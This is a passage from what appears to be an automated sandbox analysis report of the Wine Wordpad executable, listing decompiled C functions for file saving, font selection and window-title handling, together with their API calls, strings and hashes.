MoveWindow.USER32(?,00000000,00000000,?,00000000,00000001,?,?,?,?,?,?,00405955,00000000,?), ref: 00402E9D
GetClientRect.USER32 ref: 00402EAF
MoveWindow.USER32(?,00000000,00000000,?,?,00000001,?,?,?,?,?,?,00405955,00000000,?), ref: 00402EC9
DefWindowProcW.USER32(00000000,00000005,UY@,?,?,?,?,?,?,00405955,00000000,?), ref: 00402EE1

Strings

UY@, xrefs: 00402E3D, 00402E4D, 00402E54, 00402E63
UY@, xrefs: 00402EDB

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemWindow$ClientMessageMoveRectSend$ProcVisible
String ID: UY@$UY@
API String ID: 385148495-3346099111
Opcode ID: 9ac7f4f6f4695df350f55c15204e65b1e6c857c482a36135388f75e4a5d76bbc
Instruction ID: 8389ee2781938eb6d42e1b7245f2d166fd907c3ecc880515772c4b7d7388ccb8
Opcode Fuzzy Hash: 9ac7f4f6f4695df350f55c15204e65b1e6c857c482a36135388f75e4a5d76bbc
Instruction Fuzzy Hash: 48315731A40209BFDB109FA4DD89FAF7778EF44B10F11003AF605B61D1D7B8A9118BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401677, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00401677(void* __ecx, WCHAR* _a4, int _a8) {
				long _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v24;
				long _t24;
				long _t26;
				long _t30;
				int _t37;
				void* _t41;
				long _t43;

				_t41 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t41 != 0xffffffff) {
					_t37 = _a8;
					__eflags = _t37 - 0x11;
					if(_t37 != 0x11) {
						L5:
						_v24 = _t41;
						_v16 = E004052C9;
						_t43 = SendMessageW( *0x40802c, 0x44a, _t37,  &_v24);
						CloseHandle(_t41);
						SetFocus( *0x40802c);
						__eflags = _t43;
						if(_t43 != 0) {
							L8:
							lstrcpyW(0x408050, _a4);
							E00404F82(0x408050);
							SendMessageW( *0x40802c, 0xb9, 0, 0);
							 *0x408010 = _t37;
							E00404F21(__eflags);
							E0040502E();
							_t24 = 1;
							__eflags = 1;
							L9:
							return _t24;
						}
						_v12 = _v12 & _t43;
						_v8 = 0x4b0;
						_t26 = SendMessageW( *0x40802c, 0x45f,  &_v12, _t43);
						__eflags = _t26;
						if(_t26 == 0) {
							goto L8;
						}
						L7:
						_t24 = 0;
						goto L9;
					}
					WriteFile(_t41, 0x406328, 2,  &_v8, 0);
					__eflags = _v8 - 2;
					if(_v8 == 2) {
						goto L5;
					}
					CloseHandle(_t41);
					goto L7;
				}
				_t30 = GetLastError();
				asm("sbb eax, eax");
				MessageBoxW( *0x408028,  ~(_t30 - 5) + 0x6ac, L"Wine Wordpad", 0x30);
				return 0;
			}

0x00401699
0x0040169e
0x004016ce
0x004016d1
0x004016d4
0x004016f8
0x004016fb
0x0040170b
0x00401719
0x0040171b
0x00401727
0x0040172d
0x0040172f
0x00401759
0x00401762
0x00401769
0x0040177e
0x00401784
0x0040178a
0x0040178f
0x00401796
0x00401796
0x00401797
0x00000000
0x00401797
0x00401731
0x00401744
0x0040174b
0x00401751
0x00401753
0x00000000
0x00000000
0x00401755
0x00401755
0x00000000
0x00401755
0x004016e3
0x004016e9
0x004016ed
0x00000000
0x00000000
0x004016f0
0x00000000
0x004016f0
0x004016a0
0x004016ad
0x004016c0
0x00000000

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000002,?,004013AB,?,00000000,?), ref: 00401693
GetLastError.KERNEL32(?,004013AB,?,00000000,?,?,?,?,?,?,?,-00000006), ref: 004016A0
MessageBoxW.USER32(-000006B1,Wine Wordpad,00000030), ref: 004016C0
WriteFile.KERNEL32(00000000,00406328,00000002,?,00000000,00000000,?,004013AB,?,00000000,?), ref: 004016E3
CloseHandle.KERNEL32(00000000,?,004013AB,?,00000000), ref: 004016F0

Strings

Wine Wordpad, xrefs: 004016AF

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseCreateErrorHandleLastMessageWrite
String ID: Wine Wordpad
API String ID: 2854985031-1917673877
Opcode ID: c210583d0a6afba1ee7b3ae23634fdc0233633ef9672fcc630dda43814f234e6
Instruction ID: 50aba67b39e749773ebd67e13f8b50854c8cda762419190c0e14c62430d54634
Opcode Fuzzy Hash: c210583d0a6afba1ee7b3ae23634fdc0233633ef9672fcc630dda43814f234e6
Instruction Fuzzy Hash: 8431A271940204BFD710AB60EE09F6F3E7CEB45715F124039FA46B61E1DB744A149AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405866, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405866() {
				signed int _v108;
				void _v116;
				void* _v120;
				void* _v632;
				short _v1144;
				int _t29;
				signed int _t33;
				struct HWND__* _t35;

				_t35 = SendMessageW(GetDlgItem(GetDlgItem( *0x408028, 0x7d4), 0x7de), 0x407, 0, 0);
				memset( &_v116, 0, 0x70);
				_v120 = 0x74;
				SendMessageW( *0x40802c, 0x43a, 1,  &_v120);
				SendMessageW(_t35, 0xd, 0x104,  &_v1144);
				_t33 = 0x14;
				asm("cdq");
				wsprintfW( &_v632, L"%2d", _v108 / _t33);
				_t29 = lstrcmpW( &_v1144,  &_v632);
				if(_t29 != 0) {
					return SendMessageW(_t35, 0xc, 0,  &_v632);
				}
				return _t29;
			}

0x004058a1
0x004058a8
0x004058b0
0x004058c8
0x004058d9
0x004058e0
0x004058e1
0x004058f1
0x00405908
0x00405910
0x00000000
0x0040591d
0x00405923

APIs

GetDlgItem.USER32 ref: 00405883
GetDlgItem.USER32 ref: 0040588B
SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 0040589D
memset.MSVCRT ref: 004058A8
SendMessageW.USER32(0000043A,00000001,00000074), ref: 004058C8
SendMessageW.USER32(00000000,0000000D,00000104,?), ref: 004058D9
wsprintfW.USER32 ref: 004058F1
lstrcmpW.KERNEL32(?,?), ref: 00405908
SendMessageW.USER32(00000000,0000000C,00000000,?), ref: 0040591D

Strings

%2d, xrefs: 004058EB
t, xrefs: 004058B0

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$lstrcmpmemsetwsprintf
String ID: %2d$t
API String ID: 1608825967-2088718396
Opcode ID: 063ea6c7465d9803a877e81edb209f0544aad0db338adfda1dc4e36c92d37dee
Instruction ID: 3657bd2345ac8bfe75d6e069a1b72c06b610f6f155b77684f75d5b6638ad6303
Opcode Fuzzy Hash: 063ea6c7465d9803a877e81edb209f0544aad0db338adfda1dc4e36c92d37dee
Instruction Fuzzy Hash: 451160B2E4421CBAEB10A7A09D89FAB7B7CDB44744F010176B709F7081D7B5AD588FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404F82, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 63
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00404F82(intOrPtr _a4) {
				signed int _t14;
				void* _t17;
				signed int _t21;
				void* _t26;
				intOrPtr _t28;
				short _t29;
				signed int _t31;
				WCHAR* _t37;
				signed int _t38;

				if(_a4 != 0) {
					_t37 = E00403E2D(_a4);
				} else {
					_t37 = 0x408a80;
				}
				_t14 = lstrlenW(_t37);
				_t17 = HeapAlloc(GetProcessHeap(), 8, 0x20 + _t14 * 2);
				_t26 = _t17;
				if(_t26 != 0) {
					memcpy(_t26, _t37, lstrlenW(_t37) + _t18);
					_t21 = lstrlenW(_t37);
					_t28 =  *L" - "; // 0x2d0020
					_t38 = _t21;
					 *((intOrPtr*)(_t26 + _t38 * 2)) = _t28;
					_t29 =  *0x4062a0; // 0x20
					 *((short*)(_t26 + 4 + _t38 * 2)) = _t29;
					0x400000(L" - ");
					_t31 = 6;
					memcpy(_t26 + (_t38 + _t21) * 2, L"Wine Wordpad", _t31 << 2);
					asm("movsw");
					SetWindowTextW( *0x408028, _t26);
					return HeapFree(GetProcessHeap(), 0, _t26);
				}
				return _t17;
			}

0x00404f8c
0x00404f9e
0x00404f8e
0x00404f8e
0x00404f8e
0x00404fa7
0x00404fba
0x00404fc0
0x00404fc4
0x00404fce
0x00404fd7
0x00404fd9
0x00404fdf
0x00404fe6
0x00404fe9
0x00404ff0
0x00404ff5
0x00404fff
0x00405008
0x00405011
0x00405013
0x00000000
0x00405023
0x0040502d

APIs

lstrlenW.KERNEL32(00000000,00000000,00401134,?), ref: 00404FA7
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00404FB3
HeapAlloc.KERNEL32(00000000), ref: 00404FBA
lstrlenW.KERNEL32(00000000), ref: 00404FC7
memcpy.MSVCRT ref: 00404FCE
lstrlenW.KERNEL32(00000000), ref: 00404FD7
SetWindowTextW.USER32(00000000), ref: 00405013
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040501C
HeapFree.KERNEL32(00000000), ref: 00405023

Strings

- , xrefs: 00404FD9, 00404FE1
Wine Wordpad, xrefs: 00405003

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$lstrlen$Process$AllocFreeTextWindowmemcpy
String ID: - $Wine Wordpad
API String ID: 663391629-947159803
Opcode ID: 454a24841723e969c66038b62fd491a2424ed11f0cea1c87ddf0a9d1ada97b6a
Instruction ID: a1e7c6df6b3799e1e30c4dcebb55bd77f314a398b0f8cdf6e38ecd2672d2bc18
Opcode Fuzzy Hash: 454a24841723e969c66038b62fd491a2424ed11f0cea1c87ddf0a9d1ada97b6a
Instruction Fuzzy Hash: 61117372500614AFD7106FA4BD44B6B375CEB44355F06407AFA0AB7291DA795C248AE8

Uniqueness

Uniqueness Score: -1.00%

Function 004043BA, Relevance: 18.1, APIs: 12, Instructions: 96
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004043BA(struct HWND__* _a4, intOrPtr _a8, signed short _a12) {
				void* _v516;
				void* _t16;
				void* _t35;
				struct HINSTANCE__* _t45;
				struct HWND__* _t46;
				struct HWND__* _t49;

				_t16 = _a8 - 0x110;
				if(_t16 == 0) {
					_t45 = GetModuleHandleW(0);
					_t49 = GetDlgItem(_a4, 0x7d7);
					_a4 = _t49;
					LoadStringW(_t45, 0x57c,  &_v516, 0xff);
					SendMessageW(_t49, 0x180, 0,  &_v516);
					LoadStringW(_t45, 0x57d,  &_v516, 0xff);
					SendMessageW(_a4, 0x180, 0,  &_v516);
					LoadStringW(_t45, 0x57e,  &_v516, 0xff);
					_t46 = _a4;
					SendMessageW(_t46, 0x180, 0,  &_v516);
					SendMessageW(_t46, 0x185, 1, 0);
					L10:
					return 0;
				}
				if(_t16 != 1) {
					goto L10;
				}
				_t35 = (_a12 & 0x0000ffff) - 1;
				if(_t35 == 0) {
					if(SendMessageW(GetDlgItem(_a4, 0x7d7), 0x188, 0, 0) == 0xffffffff) {
						L8:
						return 1;
					}
					_push(E00403E5C(_t37) & 0x0000ffff);
					L7:
					EndDialog(_a4, ??);
					goto L8;
				}
				if(_t35 != 1) {
					goto L10;
				}
				_push(0x64);
				goto L7;
			}

0x004043c6
0x004043cb
0x00404440
0x0040444e
0x0040445b
0x00404465
0x0040447c
0x00404490
0x004044a3
0x004044b7
0x004044b9
0x004044cb
0x004044d7
0x004044dc
0x00000000
0x004044dc
0x004043d0
0x00000000
0x00000000
0x004043da
0x004043dd
0x0040440d
0x00404425
0x00000000
0x00404427
0x0040441b
0x0040441c
0x0040441f
0x00000000
0x0040441f
0x004043e2
0x00000000
0x00000000
0x004043e8
0x00000000

APIs

GetDlgItem.USER32 ref: 004043F4
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00404404
EndDialog.USER32(?,?), ref: 0040441F
GetModuleHandleW.KERNEL32(00000000), ref: 00404432
GetDlgItem.USER32 ref: 00404442
LoadStringW.USER32(00000000,0000057C,?,000000FF), ref: 00404465
SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0040447C
LoadStringW.USER32(00000000,0000057D,?,000000FF), ref: 00404490
SendMessageW.USER32(?,00000180,00000000,?), ref: 004044A3
LoadStringW.USER32(00000000,0000057E,?,000000FF), ref: 004044B7
SendMessageW.USER32(?,00000180,00000000,?), ref: 004044CB
SendMessageW.USER32(?,00000185,00000001,00000000), ref: 004044D7

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$LoadString$Item$DialogHandleModule
String ID:
API String ID: 3677071978-0
Opcode ID: 259f35802b0af022ef53043a95f793d1a0e184cbe1dd0a09fc3084c3c3356c41
Instruction ID: b0d0aac80bfce886fa8644db19e797d7277a6b0d3d771b6545040fac3afc2aaa
Opcode Fuzzy Hash: 259f35802b0af022ef53043a95f793d1a0e184cbe1dd0a09fc3084c3c3356c41
Instruction Fuzzy Hash: 0521B4B168031C7AFB205B74DD8AFBB3A6CEB84701F014032FB05F91D2D6B4DA519A68

Uniqueness

Uniqueness Score: -1.00%

Function 004057AA, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057AA() {
				long _v8;
				void* _v98;
				void _v120;
				void* _v124;
				short _v636;
				long _t19;
				struct HWND__* _t28;

				_t28 = GetDlgItem( *0x408028, 0x7d4);
				_v8 = SendMessageW(GetDlgItem(_t28, 0x7dd), 0x407, 0, 0);
				memset( &_v120, 0, 0x70);
				_v124 = 0x74;
				SendMessageW( *0x40802c, 0x43a, 1,  &_v124);
				_t19 = SendMessageW(_v8, 0xd, 0x104,  &_v636);
				if(_t19 != 0) {
					if(lstrcmpW( &_v636,  &_v98) == 0) {
						return E00405866();
					}
					SendMessageW(_v8, 0xc, 0,  &_v98);
					return E00404C59(GetDlgItem(_t28, 0x7de));
				}
				return _t19;
			}

0x004057c9
0x004057e7
0x004057f0
0x004057f8
0x00405810
0x00405823
0x00405827
0x0040583c
0x00000000
0x0040585c
0x00405849
0x00000000
0x00405859
0x00405865

APIs

GetDlgItem.USER32 ref: 004057C7
GetDlgItem.USER32 ref: 004057D1
SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 004057E3
memset.MSVCRT ref: 004057F0
SendMessageW.USER32(0000043A,00000001,00000074), ref: 00405810
SendMessageW.USER32(?,0000000D,00000104,?), ref: 00405823
lstrcmpW.KERNEL32(?,?), ref: 00405834
SendMessageW.USER32(?,0000000C,00000000,?), ref: 00405849
GetDlgItem.USER32 ref: 00405851

Part of subcall function 00404C59: GetDlgItem.USER32 ref: 00404C75
Part of subcall function 00404C59: GetDlgItem.USER32 ref: 00404C7D
Part of subcall function 00404C59: SendMessageW.USER32(YX@,00000407,00000000,00000000), ref: 00404C93
Part of subcall function 00404C59: GetDC.USER32 ref: 00404C9E
Part of subcall function 00404C59: memset.MSVCRT ref: 00404CB2
Part of subcall function 00404C59: SendMessageW.USER32(0000043A,00000001,00000074), ref: 00404CD8
Part of subcall function 00404C59: SendMessageW.USER32(00000000,00000158,000000FF,?), ref: 00404CF0
Part of subcall function 00404C59: SendMessageW.USER32(00000000,0000040D,00000000,00000020), ref: 00404D01
Part of subcall function 00404C59: SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00404D13
Part of subcall function 00404C59: GetDeviceCaps.GDI32(?,0000005A), ref: 00404D29
Part of subcall function 00404C59: MulDiv.KERNEL32(?,00000048,00000000), ref: 00404D39
Part of subcall function 00404C59: wsprintfW.USER32 ref: 00404D94
Part of subcall function 00404C59: SendMessageW.USER32(?,0000000C,00000000,?), ref: 00404DA8

Strings

t, xrefs: 004057F8

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$memset$CapsDevicelstrcmpwsprintf
String ID: t
API String ID: 2676846903-2238339752
Opcode ID: 515ac3ab2b5f9cac79b79bec4bc4873b9fc84f3cb4842dc7659b739d4b7c8517
Instruction ID: 76a08784f9cefb6c8713346cc162958efce03af1603c7fba2885ec0329e39ed6
Opcode Fuzzy Hash: 515ac3ab2b5f9cac79b79bec4bc4873b9fc84f3cb4842dc7659b739d4b7c8517
Instruction Fuzzy Hash: 491130B2E44208BAFB20B7B19D4AF9F7B7CDB44704F110036B705BA0D1DAB5A9548EA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040508E, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040508E(WCHAR* _a4) {
				short _v94;
				void _v112;
				intOrPtr _v116;
				void* _v120;
				struct HWND__* _t9;
				struct HWND__* _t11;
				struct HWND__* _t24;

				_t24 = GetDlgItem( *0x408028, 0x7d4);
				_t9 = GetDlgItem(_t24, 0x7de);
				_t11 = SendMessageW(GetDlgItem(_t24, 0x7dd), 0x407, 0, 0);
				memset( &_v112, 0, 0x6c);
				_v120 = 0x74;
				_v116 = 0x20000000;
				lstrcpyW( &_v94, _a4);
				SendMessageW( *0x40802c, 0x444, 1,  &_v120);
				E00404C59(_t9);
				return SendMessageW(_t11, 0xc, 0, _a4);
			}

0x004050aa
0x004050b2
0x004050ce
0x004050da
0x004050e2
0x004050ec
0x004050f7
0x0040510e
0x00405111
0x00405125

APIs

GetDlgItem.USER32 ref: 004050A8
GetDlgItem.USER32 ref: 004050B2
GetDlgItem.USER32 ref: 004050BC
SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 004050CE
memset.MSVCRT ref: 004050DA
lstrcpyW.KERNEL32 ref: 004050F7
SendMessageW.USER32(00000444,00000001,00000074), ref: 0040510E

Part of subcall function 00404C59: GetDlgItem.USER32 ref: 00404C75
Part of subcall function 00404C59: GetDlgItem.USER32 ref: 00404C7D
Part of subcall function 00404C59: SendMessageW.USER32(YX@,00000407,00000000,00000000), ref: 00404C93
Part of subcall function 00404C59: GetDC.USER32 ref: 00404C9E
Part of subcall function 00404C59: memset.MSVCRT ref: 00404CB2
Part of subcall function 00404C59: SendMessageW.USER32(0000043A,00000001,00000074), ref: 00404CD8
Part of subcall function 00404C59: SendMessageW.USER32(00000000,00000158,000000FF,?), ref: 00404CF0
Part of subcall function 00404C59: SendMessageW.USER32(00000000,0000040D,00000000,00000020), ref: 00404D01
Part of subcall function 00404C59: SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00404D13
Part of subcall function 00404C59: GetDeviceCaps.GDI32(?,0000005A), ref: 00404D29
Part of subcall function 00404C59: MulDiv.KERNEL32(?,00000048,00000000), ref: 00404D39
Part of subcall function 00404C59: wsprintfW.USER32 ref: 00404D94
Part of subcall function 00404C59: SendMessageW.USER32(?,0000000C,00000000,?), ref: 00404DA8

SendMessageW.USER32(00000000,0000000C,00000000,004045FE), ref: 0040511F

Strings

t, xrefs: 004050E2

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$memset$CapsDevicelstrcpywsprintf
String ID: t
API String ID: 3783183668-2238339752
Opcode ID: d225d8cad2e6729c7a05616c3ed0efa08a40973bcfce4f68034b8efbc0791c2a
Instruction ID: 088710fee96e313fedceb1f4801942ea7feed934dcc3f12bfa8b0f855de7ce5e
Opcode Fuzzy Hash: d225d8cad2e6729c7a05616c3ed0efa08a40973bcfce4f68034b8efbc0791c2a
Instruction Fuzzy Hash: AA018072A40208BAEB2067A19D46F8E7A7C9F84B04F220136F705BB1D1D6F569048AA8

Uniqueness

Uniqueness Score: -1.00%

Function 004039F6, Relevance: 15.1, APIs: 10, Instructions: 134
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004039F6() {
				struct %anon40 _v64;
				short _v154;
				intOrPtr _v160;
				signed int _v168;
				unsigned int _v172;
				void _v176;
				void* _v180;
				char _v272;
				struct HDC__* _t58;
				int _t83;
				signed int _t88;
				int _t96;
				signed int _t108;
				signed int* _t110;
				int _t113;

				_t58 = GetDC( *0x408028);
				_t113 = 0x3c;
				memset( &_v64, 0, _t113);
				_v64.hwndOwner =  *0x408028;
				_v64.lpLogFont =  &_v272;
				_v64.lStructSize = _t113;
				_v64.Flags = 0x1800141;
				memset( &_v176, 0, 0x70);
				_t96 = 0x74;
				_v180 = _t96;
				SendMessageW( *0x40802c, 0x43a, 1,  &_v180);
				lstrcpyW( &(_v64.lpLogFont[7]),  &_v154);
				_push(0x48);
				_v64.lpLogFont[5] = _v172 >> 0x00000001 & 0x00000001;
				_t101 =  !=  ? 0x2bc : 0x190;
				_v64.lpLogFont[4] =  !=  ? 0x2bc : 0x190;
				_v64.lpLogFont[5] = _v172 >> 0x00000002 & 0x00000001;
				_v64.lpLogFont[5] = _v172 >> 0x00000003 & 0x00000001;
				_push(GetDeviceCaps(_t58, 0x5a));
				_t108 = 0x14;
				asm("cdq");
				 *(_v64.lpLogFont) =  ~(MulDiv(_v168 / _t108, ??, ??));
				_v64.rgbColors = _v160;
				_t83 = ChooseFontW( &_v64);
				if(_t83 != 0) {
					memset( &_v180, 0, _t96);
					_v180 = _t96;
					_v168 = _v64.iPointSize + _v64.iPointSize;
					_t88 = _v172;
					_v176 = 0xc000000f;
					if((_v64.nFontType & 0x00000100) != 0) {
						_t88 = _t88 | 0x00000001;
						_v172 = _t88;
					}
					if((_v64.nFontType & 0x00000200) != 0) {
						_t88 = _t88 | 0x00000002;
						_v172 = _t88;
					}
					_t110 = _v64.lpLogFont;
					if( *((char*)(_t110 + 0x15)) != 0) {
						_t88 = _t88 | 0x00000004;
						_v172 = _t88;
					}
					if( *((char*)(_t110 + 0x16)) != 0) {
						_v172 = _t88 | 0x00000008;
					}
					_v160 = _v64.rgbColors;
					SendMessageW( *0x40802c, 0x444, 1,  &_v180);
					return E0040508E( &(_v64.lpLogFont[7]));
				}
				return _t83;
			}

0x00403a08
0x00403a10
0x00403a1a
0x00403a24
0x00403a2f
0x00403a3b
0x00403a3e
0x00403a45
0x00403a5b
0x00403a6a
0x00403a70
0x00403a80
0x00403a94
0x00403a96
0x00403aac
0x00403ab3
0x00403ac5
0x00403ad7
0x00403ae0
0x00403ae9
0x00403aea
0x00403af9
0x00403b01
0x00403b08
0x00403b10
0x00403b20
0x00403b2d
0x00403b3a
0x00403b40
0x00403b46
0x00403b50
0x00403b52
0x00403b55
0x00403b55
0x00403b62
0x00403b64
0x00403b67
0x00403b67
0x00403b6d
0x00403b74
0x00403b76
0x00403b79
0x00403b79
0x00403b83
0x00403b88
0x00403b88
0x00403b91
0x00403bab
0x00000000
0x00403bb9
0x00403bbe

APIs

GetDC.USER32(00000000), ref: 00403A08
memset.MSVCRT ref: 00403A1A
memset.MSVCRT ref: 00403A45
SendMessageW.USER32(0000043A,00000001,?), ref: 00403A70
lstrcpyW.KERNEL32 ref: 00403A80
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00403ADA
MulDiv.KERNEL32(?,00000000), ref: 00403AEE
ChooseFontW.COMDLG32(?,?,?,?,?,?,?), ref: 00403B08
memset.MSVCRT ref: 00403B20
SendMessageW.USER32(00000444,00000001,?), ref: 00403BAB

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$MessageSend$CapsChooseDeviceFontlstrcpy
String ID:
API String ID: 2971190071-0
Opcode ID: 29ae1af4c250a7400e92ec4ac0103240a62a9f32140ad32d6f41a31269a721cd
Instruction ID: 7677975ca5ebc87dd55c39c5c6a7005394596e964822936d366bb523aa16e956
Opcode Fuzzy Hash: 29ae1af4c250a7400e92ec4ac0103240a62a9f32140ad32d6f41a31269a721cd
Instruction Fuzzy Hash: 8E511C71E00318AFEB25DF68DC45BDABBB8AB05304F0040AAE549B7292D7759A84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004051AE, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004051AE(int _a4, long _a8) {
				signed int _v96;
				intOrPtr _v100;
				void* _v104;
				struct HWND__* _t15;
				long _t17;
				int _t19;
				struct HWND__* _t26;
				int _t27;

				_t15 = GetDlgItem( *0x408028, 0x7d4);
				_t2 =  &_a4; // 0x40336a
				_t27 =  *_t2;
				_t26 = _t15;
				_t17 = SendMessageW(_t26, 0x423, SendMessageW(_t26, 0x410, _t27, 0), _a8);
				if(_t27 == 2) {
					_t19 = SendMessageW(_t26, 0x410, 4, 0);
					_a4 = _t19;
					_v104 = 0x50;
					_v100 = 1;
					SendMessageW(_t26, 0x41c, _t19,  &_v104);
					if(_a8 != 0) {
						_v96 = _v96 | 0x00000001;
					} else {
						_v96 = _v96 & 0xfffffffe;
					}
					_t13 =  &_a4; // 0x40336a
					_t17 = SendMessageW(_t26, 0x40b,  *_t13,  &_v104);
					L7:
					return E0040526E(_t17, _t27, _a8);
				}
				if(_t27 == 3 || _t27 == 0) {
					goto L7;
				}
				return _t17;
			}

0x004051c2
0x004051cb
0x004051cb
0x004051ce
0x004051e8
0x004051ed
0x004051f9
0x004051fe
0x00405209
0x00405210
0x00405217
0x0040521d
0x00405225
0x0040521f
0x0040521f
0x0040521f
0x0040522d
0x00405236
0x00405243
0x00000000
0x0040524d
0x0040523d
0x00000000
0x00000000
0x00405252

APIs

GetDlgItem.USER32 ref: 004051C2
SendMessageW.USER32(00000000,00000410,j3@,00000000), ref: 004051DF
SendMessageW.USER32(00000000,00000423,00000000), ref: 004051E8
SendMessageW.USER32(00000000,00000410,00000004,00000000), ref: 004051F9
SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 00405217
SendMessageW.USER32(00000000,0000040B,j3@,00000050), ref: 00405236

Strings

P, xrefs: 00405209
j3@, xrefs: 004051CB, 0040522D, 004051D8, 00405246

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID: P$j3@
API String ID: 3888421826-378956521
Opcode ID: 274afefec206b1b15a052ff220b64df5b92cbf096b0b87250c1ef554160504be
Instruction ID: 4aa57435f936d70edd00c1acdcc3b1a6c4df37317b018051a5da904dd0294f8e
Opcode Fuzzy Hash: 274afefec206b1b15a052ff220b64df5b92cbf096b0b87250c1ef554160504be
Instruction Fuzzy Hash: CE11A076900308BEEB119B50DC85FAF7B78EF55728F10802AFA197A1D0C7B55981CEAD

Uniqueness

Uniqueness Score: -1.00%

Function 00404601, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404601(void* __fp0, struct HWND__* _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v112;
				void _v120;
				void* _v124;
				short _v636;
				int _t27;
				signed int _t34;
				void* _t43;

				memset( &_v120, 0, 0x70);
				_v124 = 0x74;
				SendMessageW( *0x40802c, 0x43a, 1,  &_v124);
				_t34 = 0x14;
				asm("cdq");
				wsprintfW( &_v636, L"%2d", _v112 / _t34);
				_t27 = lstrcmpW( &_v636, _a8);
				if(_t27 == 0) {
					return _t27;
				} else {
					_v8 = _v8 & 0x00000000;
					_t43 = E004044E2( &_v8, __fp0, _a8,  &_v8, 0);
